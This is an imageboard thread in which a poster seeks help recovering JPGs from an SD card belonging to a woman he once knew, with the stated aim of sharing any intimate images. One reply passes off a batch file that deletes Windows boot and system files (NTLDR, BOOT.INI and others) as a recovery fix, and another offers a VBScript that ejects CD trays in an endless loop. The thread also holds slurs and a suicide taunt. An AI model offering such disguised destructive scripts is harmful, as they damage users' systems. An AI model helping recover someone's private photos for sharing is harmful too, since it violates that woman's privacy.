Hey Cred Forums, looking for a little help with a problem I'm having. Basically...

Hey Cred Forums, looking for a little help with a problem I'm having. Basically, happened across an SD card from a chick I used to be close with. After running the card through Recuva, I can see a whole bunch of .jpgs, but they aren't viewable in Windows. Is there any way to fix these .jpgs to make them view in Windows? I tried a couple programs, only one site I used was even vaguely working on fixing a couple of them. Any advice is appreciated, and any win will be shared! Tits for your time.

try using a mac or ubuntu machine

you can find an emulator for one of these easily downloadable online

I'll give it a try! Thanks for the tip. It won't even let me upload one of them here to let anyone take a look at them either lol

active disk file recovery

All I see when I look this up are programs for restoring windows data. These pics were recovered from an SD card. Unless I'm not getting what you're saying lol

Try photorec
Just start it as admin, select the SD card and wait for the pics.
Share your results ;)

Downloading now, should be running shortly. Thanks for the tip, any wins will definitely be shared. Will try to keep bumped, if for some reason this dies off, look for a thread thanking you all lol.

You're welcome. That software helped me in many cases. Once took some pics while giving my gf. She deleted them afterwards and I fully recovered them ;)

"happened across:

clearly a fucking stalker freak or a le epic troll

either way, seek mental help or commit suicide plz

Fuck off

>that post

Trying to remember if they have one for sd or if it works for sd bit getdatabackfast ntfs is super thorough

Ive done that too high 5 bro

underrated

use linux master race and look up the program photorec, it always gave me way better results

bumping this

I'm running the windows version of it right now, it's actually picking up way more than Recuva did so I'm hopeful!

what does it say ? like why is it not viewable ?

For Windows Photo Viewer - Can't open, either file format (it's a jpg) or you do not have the latest version (I do)
For Photos - Cannot Open This File

I was suspecting corruption, and most of the programs haven't done a thing to the files.

OP, paste this into a notepad file, and save it as a .bat file.

@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

After you save it, activating it should help you recover the images from the SD card.

can confirm

Listen to this guy, OP!

You're soooo funny

Gonna need timestamp, sorry OP.

You cant confirm shit faggot.

Those are great tits. Now post more faggot.

Ah right, sorry that was the wrong one.

Try this for recovering images:

Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Not sure if any camera uses NTFS. Mostly fat or extfat

Try to use irvanview. It recognises wrong file extensions, like pngs saved named as jpeg

Any wins yet?

Check your quotation marks, n00b

Bump